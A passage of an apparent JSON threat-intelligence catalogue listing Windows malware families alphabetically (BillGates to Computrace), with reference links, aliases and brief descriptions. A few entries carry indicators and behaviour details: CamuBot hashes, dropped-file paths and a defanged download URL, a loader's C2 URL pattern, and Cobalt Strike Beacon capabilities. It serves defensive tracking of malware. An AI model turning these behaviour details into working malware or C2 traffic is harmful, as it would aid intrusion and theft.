perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates", "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", "https://habrahabr.ru/post/213973/", "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf" ], "synonyms": [], "type": [] }, "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biscuit", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "zxdosml" ], "type": [] }, "uuid": "f98b4092-5f32-407c-9015-2da787d70c64", "value": "Biscuit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitsran", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" ], "synonyms": [], "type": [] }, "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bka_trojaner", "https://www.evild3ad.com/405/bka-trojaner-ransomware/" ], "synonyms": [ "bwin3_bka" ], "type": [] }, "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", "value": "BKA Trojaner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" ], "synonyms": [], "type": [] }, "uuid": "82c644ab-550a-4a83-9b35-d545f4719069", "value": "BlackEnergy" }, { "description": "BlackPOS infects computers running on Windows that have credit card readers connected to them and are part of a POS system. POS system computers can be easily infected if they do not have the most up to date operating systems and antivirus programs to prevent security breaches or if the computer database systems have weak administration login credentials. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" ], "synonyms": [ "Kaptoxa", "POSWDS", "Reedum" ], "type": [] }, "uuid": "1e62fc1f-daa7-416f-9159-099798bb862c", "value": "BlackPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrevolution", "https://www.arbornetworks.com/blog/asert/the-revolution-will-be-written-in-delphi/" ], "synonyms": [], "type": [] }, "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", "value": "BlackRevolution" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/" ], "synonyms": [], "type": [] }, "uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b", "value": "BlackShades" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe", "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" ], "synonyms": [], "type": [] }, "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", "value": "Boaxxe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini" ], "synonyms": [], "type": [] }, "uuid": "444ca9d1-7128-40fa-9665-654194dfbe0b", "value": "Bohmini" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", "https://asert.arbornetworks.com/communications-bolek-trojan/", "http://www.cert.pl/news/11379" ], "synonyms": [ "KBOT" ], "type": [] }, "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", "value": "Bolek" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "80487bca-7629-4cb2-bf5b-993d5568b699", "value": "Bouncer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" ], "synonyms": [], "type": [] }, "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", "value": "Bozok" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", "https://www.us-cert.gov/ncas/alerts/TA18-149A", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" ], "synonyms": [], "type": [] }, "uuid": "d97ae60e-612a-4feb-908a-8c4d32e9d763", "value": "Brambul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bravonc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "fbed27da-551d-4793-ba7e-128256326909", "value": "BravoNC" }, { "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" ], "synonyms": [], "type": [] }, "uuid": "a05b8e4b-a686-439f-8094-037fbcda52bd", "value": "Breakthrough" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/", "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html" ], "synonyms": [], "type": [] }, "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos", "https://www.fireeye.com/blog/threat-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html" ], "synonyms": [], "type": [] }, "uuid": "e413c33a-badd-49a1-8d44-c9a0983b5151", "value": "BrutPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "35e00ff0-704e-4e61-b9bb-9ed20a4a008f", "value": "BS2005" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware", "https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/" ], "synonyms": [], "type": [] }, "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", "value": "BTCWare" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bugat_alreadydump" ], "synonyms": [], "type": [] }, "uuid": "16794655-c0e2-4510-9169-f862df104045", "value": "Bugat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" ], "synonyms": [ "Ratopak" ], "type": [] }, "uuid": "fa278536-8293-4717-86b5-8a03aa11063f", "value": "Buhtrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner", "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", "https://www.f-secure.com/weblog/archives/00002249.html", "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" ], "synonyms": [ "0zapftis", "R2D2" ], "type": [] }, "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", "value": "Bundestrojaner" }, { "description": "Bunitu is a trojan that exposes infected computers to be used as a proxy for remote clients. It registers itself at startup by providing its address and open ports. Access to Bunitu proxies is available by using criminal VPN services (e.g.VIP72).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", "http://malware-traffic-analysis.net/2017/05/09/index.html", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], "synonyms": [], "type": [] }, "uuid": "4350b52a-8100-49b5-848d-d4a4029e949d", "value": "Bunitu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat", "http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html" ], "synonyms": [ "spyvoltar" ], "type": [] }, "uuid": "cd4ee7f0-394e-4129-a1dc-d5fb423f2311", "value": "Buterat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Yimfoca.A" ], "synonyms": [ "Yimfoca" ], "type": [] }, "uuid": "69a3e0ed-1727-4a9c-ae21-1e32322ede93", "value": "Buzus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan" ], "synonyms": [], "type": [] }, "uuid": "12886243-55b6-4864-bf7a-7e2439e3a4c1", "value": "BYEBY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" ], "synonyms": [], "type": [] }, "uuid": "b6b187d0-e19f-489a-91c0-7c94519555f6", "value": "c0d0so0" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart" ], "synonyms": [], "type": [] }, "uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c", "value": "CabArt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" ], "synonyms": [ "Cadelle" ], "type": [] }, "uuid": "cad83c5e-2081-4ab4-81c7-32cfc16eae66", "value": "CadelSpy" }, { "description": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot", "https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/" ], "synonyms": [], "type": [] }, "uuid": "ecac83ab-cd64-4def-979a-40aeeca0400b", "value": "CamuBot" }, { "description": "Cannibal Rat is a python written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat", "http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html" ], "synonyms": [], "type": [] }, "uuid": "1e722d81-085e-4beb-8901-aa27fe502dba", "value": "Cannibal Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon", "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "synonyms": [], "type": [] }, "uuid": "3fada5b6-0b3d-4b83-97c9-2157c959704c", "value": "Cannon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" ], "synonyms": [ "Anunak" ], "type": [] }, "uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832", "value": "Carbanak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp" ], "synonyms": [], "type": [] }, "uuid": "8f0d4866-7c67-4376-a6f2-958224d3c9d0", "value": "Carberp" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" ], "synonyms": [], "type": [] }, "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, { "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper", "https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/" ], "synonyms": [], "type": [] }, "uuid": "3198501e-0ff0-43b7-96f0-321b463ab656", "value": "Casper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", "value": "Catchamas" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor", "https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities", "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident", "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/", "https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident", "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html", "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/", "https://blog.avast.com/progress-on-ccleaner-investigation", "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms", "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer", "https://twitter.com/craiu/status/910148928796061696", "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/", "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor", "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/", "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html" ], "synonyms": [], "type": [] }, "uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139", "value": "CCleaner Backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos", "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" ], "synonyms": [ "cerebrus" ], "type": [] }, "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", "value": "CenterPOS" }, { "description": "A prolific ransomware which originally added \".cerber\" as a file extension to encrypted files. Has undergone multiple iterations in which the extension has changed. Uses a very readily identifiable set of of UDP activity to checkin and report infections. Primarily uses TOR for payment information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber", "http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/", "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html", "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/", "https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/" ], "synonyms": [], "type": [] }, "uuid": "79a7203a-6ea5-4c39-abd4-faa20cf8821a", "value": "Cerber" }, { "description": "This malware family delivers its artifacts packed with free and generic packers. It writes files to windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner" ], "synonyms": [], "type": [] }, "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", "value": "Cerbu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/", "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack" ], "synonyms": [], "type": [] }, "uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6", "value": "Chainshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chches", "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html", "https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", "https://www.jpcert.or.jp/magazine/acreport-ChChes.html", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [ "Ham Backdoor" ], "type": [] }, "uuid": "6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c", "value": "ChChes" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/" ], "synonyms": [ "cherry_picker", "cherrypicker", "cherrypickerpos" ], "type": [] }, "uuid": "e6ab90d3-8011-4927-a0cd-eab57e7971aa", "value": "CherryPicker POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca", "http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/" ], "synonyms": [], "type": [] }, "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, { "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad" ], "synonyms": [], "type": [] }, "uuid": "098cfb93-8921-48f0-a694-a83f350e8a61", "value": "Chinad" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir" ], "synonyms": [], "type": [] }, "uuid": "59b5697a-5154-4c08-87f8-c71b0e8425fc", "value": "Chir" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://www.s21sec.com/en/blog/2017/07/androkins/", "https://securelist.com/chthonic-a-new-modification-of-zeus/68176/" ], "synonyms": [ "AndroKINS" ], "type": [] }, "uuid": "9441a589-e23d-402d-9603-5e55e3e33971", "value": "Chthonic" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" ], "synonyms": [], "type": [] }, "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", "value": "Citadel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" ], "synonyms": [], "type": [] }, "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", "value": "Client Maximus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", "https://www.f-secure.com/weblog/archives/00002822.html" ], "synonyms": [], "type": [] }, "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", "value": "Cloud Duke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" ], "synonyms": [], "type": [] }, "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", "value": "CMSBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", "https://twitter.com/ClearskySec/status/963829930776723461", "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" ], "synonyms": [ "meciv" ], "type": [] }, "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", "value": "CMSTAR" }, { "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html" ], "synonyms": [], "type": [] }, "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", "value": "Cobalt Strike" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" ], "synonyms": [], "type": [] }, "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", "value": "Cobian RAT" }, { "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://www.group-ib.com/blog/renaissance" ], "synonyms": [ "COOLPANTS" ], "type": [] }, "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", "value": "CobInt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", "https://github.com/hfiref0x/TDL", "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/" ], "synonyms": [ "Carbon" ], "type": [] }, "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", "value": "Cobra Carbon System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", "https://twitter.com/JaromirHorejsi/status/817311664391524352" ], "synonyms": [], "type": [] }, "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", "value": "CockBlocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" ], "synonyms": [], "type": [] }, "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", "value": "CodeKey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" ], "synonyms": [], "type": [] }, "uuid": "9481d7b1-307c-4504-9333-21720b85317b", "value": "Cohhoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/", "https://secrary.com/ReversingMalware/CoinMiner/" ], "synonyms": [], "type": [] }, "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", "value": "Coinminer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", "https://twitter.com/anyrun_app/status/976385355384590337", "https://secrary.com/ReversingMalware/Colony_Bandios/", "https://pastebin.com/GtjBXDmz" ], "synonyms": [ "Bandios", "GrayBird" ], "type": [] }, "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", "value": "Colony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" ], "synonyms": [], "type": [] }, "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", "value": "Combojack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", "value": "Combos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" ], "synonyms": [], "type": [] }, "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", "value": "ComodoSec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/", "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", 